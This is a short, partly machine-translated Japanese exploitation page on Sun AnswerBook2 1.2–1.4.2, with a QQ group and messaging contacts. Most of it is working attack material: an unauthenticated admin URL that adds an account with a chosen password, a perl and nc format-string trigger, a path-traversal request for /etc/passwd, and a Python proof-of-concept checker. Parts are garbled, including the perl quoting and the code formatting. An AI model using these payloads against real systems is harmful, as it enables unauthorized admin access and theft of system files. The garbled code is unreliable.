搾取-Sun-AnswerBook
Exploitation Sun Answerbook
QQ 1285575001
Wechat M010527
テクニカルエクスチェンジQQグループ599020441
私たちの年表
SunのAnswerBookには複数の脆弱性があります
1つ、Unauthorized management script access vulnerability
:
1.影響を受けるバージョン:
Sun-AnswerBook2 1.2-1.4.2
2.攻撃テスト方法
http://a.b.c.d:8888/ab2/@AdminViewError# access error log
http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#Add account (password)
2、Remote format string vulnerability
1.影響を受けるバージョン:
Sun-AnswerBook2 1.2-1.4.2
2.攻撃テスト方法:
perl -e 'print'GET /'print'%x'x20print' HTTP/1.0
'' | nc localhost 8888
次のエラーが表示されます。
http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The requested object '/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520 7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6 c69622f6162322f646174612f646f63732f' could not be opened!
3、Arbitrary file reading
(一部のHTTPプロキシにもこの脆弱性があります):
脆弱なホストの対応するポートに直接接続します()
ペイロードを送信する GET /../../../../../../../../../etc/passwd HTTP/1.1
対応するファイルの内容を取得できます
XunfengのPOCを参照してください。
def check(ip, port, timeout): try: socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, int(port))) flag = 'GET /../../../../../../../../../etc/passwd HTTP/1.1
' s.send(flag) data = s.recv(1024) s.close() if 'root:' in data and 'nobody:' in data: return u'Vulnerability' except: pass